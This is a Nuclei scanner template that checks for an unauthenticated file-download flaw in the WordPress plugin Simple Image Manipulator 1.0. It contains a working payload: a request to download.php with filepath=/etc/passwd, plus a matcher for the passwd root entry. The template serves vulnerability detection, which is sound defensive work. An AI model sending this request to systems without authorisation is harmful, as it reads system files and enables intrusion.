nuclei-templates/vulnerabilities/wordpress/simple-image-manipulator-lf...

26 lines
766 B
YAML

id: simple-image-manipulator-lfi
info:
name: Simple Image Manipulator v1.0 - Remote file download
author: dhiyaneshDK
severity: high
description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
reference:
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200